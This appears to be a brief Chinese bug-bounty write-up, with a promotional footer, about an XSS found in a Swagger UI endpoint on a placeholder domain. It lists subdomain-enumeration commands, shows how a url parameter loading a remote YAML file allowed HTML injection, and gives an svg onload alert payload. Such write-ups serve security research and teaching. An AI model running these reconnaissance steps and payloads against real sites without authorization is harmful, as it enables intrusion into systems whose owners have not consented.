正文
目标为target.com
信息搜集:
subfinder -d target.com -silent -o list.txt
httpx -l list.txt -sc — title > httpx_target.txt
发现某个子域名https://subdomain.target.com
重定向至4343端口,并显示连接超时,
对其暴力破解,发现一个接口 https://subdomain.target.com/api/
,
发现其使用的是 Swagger(开发者一般使用其作为接口文档使用),准备测试 XSS
https://subdomain.target.com/api/index.html?url=https://jumpy-floor.surge.sh/test.yaml
注入url参数<h1>Hello</h1>
,结果显示的是Hello,故这里有html注入,注入xss的payload: url=”xss><svg/onload=alert()>
发现弹窗!
如果你是一个长期主义者,欢迎加入我的知识星球(优先查看这个链接,里面可能还有优惠券),我们一起往前走,每日都会更新,精细化运营,微信识别二维码付费即可加入,如不满意,72 小时内可在 App 内无条件自助退款
往期回顾
原文始发于微信公众号(迪哥讲事):一处价值600美刀的xss
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论